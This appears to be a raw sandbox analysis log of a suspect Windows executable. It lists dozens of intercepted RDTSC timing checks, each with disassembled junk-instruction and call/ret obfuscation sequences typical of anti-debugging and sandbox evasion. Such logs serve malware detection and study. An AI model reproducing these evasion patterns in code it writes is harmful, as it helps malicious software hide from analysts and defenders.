Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4C622 second address: E4C65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F4BA0D39716h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F4BA0D39706h 0x00000014 jmp 00007F4BA0D39713h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4C65A second address: E4C660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4CBB2 second address: E4CBE0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F4BA0D39719h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F4BA0D3970Ch 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4E6CA second address: E4E6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4EAA2 second address: E4EAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4EF9E second address: E4EFD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a mov edi, dword ptr [ebp+122D2AF7h] 0x00000010 push eax 0x00000011 pushad 0x00000012 jmp 00007F4BA0D3F168h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F4BA0D3F156h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F1BF second address: E4F1C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F4BB second address: E4F502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F4BA0D3F158h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 pushad 0x00000024 js 00007F4BA0D3F157h 0x0000002a stc 0x0000002b adc ch, FFFFFFF5h 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F4BA0D3F15Eh 0x00000039 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F502 second address: E4F508 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F508 second address: E4F50F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F9FB second address: E4F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E4F9FF second address: E4FA17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E50444 second address: E5044A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5044A second address: E5047C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4BA0D3F165h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E515B5 second address: E515B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E50C60 second address: E50C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E50C64 second address: E50C68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E50C68 second address: E50C6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52C7B second address: E52C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52C8B second address: E52C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52D29 second address: E52D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52D2D second address: E52D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52D31 second address: E52D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52D37 second address: E52D3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E52D3D second address: E52D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E54E3E second address: E54EDA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3F158h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F4BA0D3F158h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jne 00007F4BA0D3F16Eh 0x0000002f mov dword ptr [ebp+122D2848h], edx 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007F4BA0D3F158h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 0000001Ah 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 push 00000000h 0x00000053 jmp 00007F4BA0D3F166h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c jmp 00007F4BA0D3F15Ch 0x00000061 pop eax 0x00000062 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E581C1 second address: E581F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 mov bx, 7DB9h 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+1246C301h] 0x00000015 push 00000000h 0x00000017 mov bl, CAh 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4BA0D39712h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E581F1 second address: E581F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E581F5 second address: E581FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E59051 second address: E59068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D3F162h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E59F0A second address: E59F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E59F0E second address: E59F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E59F14 second address: E59F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D39711h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5AEBE second address: E5AEDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jc 00007F4BA0D3F156h 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5AEDE second address: E5AEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5833C second address: E58342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5A090 second address: E5A09A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4BA0D39706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5B13E second address: E5B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5913B second address: E59142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5D0BF second address: E5D0DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D3F166h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5DF22 second address: E5DF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4BA0D39706h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007F4BA0D3971Fh 0x00000012 pushad 0x00000013 jmp 00007F4BA0D39711h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E59201 second address: E59205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5D0DA second address: E5D162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F4BA0D39708h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b mov di, C9A0h 0x0000002f mov dword ptr fs:[00000000h], esp 0x00000036 mov edi, 4862E83Ah 0x0000003b mov eax, dword ptr [ebp+122D0A21h] 0x00000041 jmp 00007F4BA0D39710h 0x00000046 push FFFFFFFFh 0x00000048 push eax 0x00000049 add bx, 3F2Bh 0x0000004e pop ebx 0x0000004f nop 0x00000050 pushad 0x00000051 jmp 00007F4BA0D39713h 0x00000056 jng 00007F4BA0D39708h 0x0000005c push ebx 0x0000005d pop ebx 0x0000005e popad 0x0000005f push eax 0x00000060 push esi 0x00000061 pushad 0x00000062 push edx 0x00000063 pop edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5E059 second address: E5E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5E05E second address: E5E075 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F4BA0D3970Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5FF6E second address: E5FF78 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4BA0D3F15Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5FF78 second address: E5FF85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5FF85 second address: E5FF8F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E5FF8F second address: E5FF95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E6313E second address: E63143 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E63143 second address: E63149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E63149 second address: E6315F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4BA0D3F15Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E6315F second address: E63164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E601EC second address: E601F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E62249 second address: E6224F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E6224F second address: E62253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E650C5 second address: E65112 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F4BA0D39713h 0x0000000c popad 0x0000000d jmp 00007F4BA0D39719h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4BA0D3970Ah 0x0000001b pushad 0x0000001c jnc 00007F4BA0D39706h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E65112 second address: E65117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E66811 second address: E668B7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jc 00007F4BA0D39706h 0x00000010 jmp 00007F4BA0D3970Dh 0x00000015 popad 0x00000016 jmp 00007F4BA0D39716h 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007F4BA0D39708h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 jmp 00007F4BA0D39711h 0x0000003c mov dword ptr [ebp+122D280Dh], ebx 0x00000042 push 00000000h 0x00000044 mov ebx, 2259C726h 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F4BA0D39708h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov dword ptr [ebp+122D1F09h], esi 0x0000006b xchg eax, esi 0x0000006c push ebx 0x0000006d push eax 0x0000006e push edx 0x0000006f jp 00007F4BA0D39706h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E658EC second address: E658F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E67A2E second address: E67A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E67A32 second address: E67A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4BA0D3F163h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E66B54 second address: E66B6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39710h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E66B6C second address: E66B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E66B7A second address: E66B80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E68B25 second address: E68B2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E68B2B second address: E68B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E67BC8 second address: E67BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E67BCC second address: E67BDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F4BA0D39706h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E70A53 second address: E70A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E70A58 second address: E70A5D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E70E41 second address: E70E4B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4BA0D3F156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E75581 second address: E75587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7561F second address: E75623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7570B second address: E75750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F4BA0D39706h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F4BA0D39715h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jmp 00007F4BA0D39715h 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E75750 second address: E75754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E75754 second address: E75758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A35D second address: E7A36E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4BA0D3F156h 0x0000000a jnc 00007F4BA0D3F156h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A36E second address: E7A378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4BA0D39706h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A4AA second address: E7A4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4BA0D3F156h 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A632 second address: E7A638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A638 second address: E7A653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4BA0D3F162h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A653 second address: E7A65D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D39706h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A792 second address: E7A7A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A7A0 second address: E7A7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4BA0D3970Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7A8E2 second address: E7A8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7AA92 second address: E7AA98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E7AA98 second address: E7AA9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
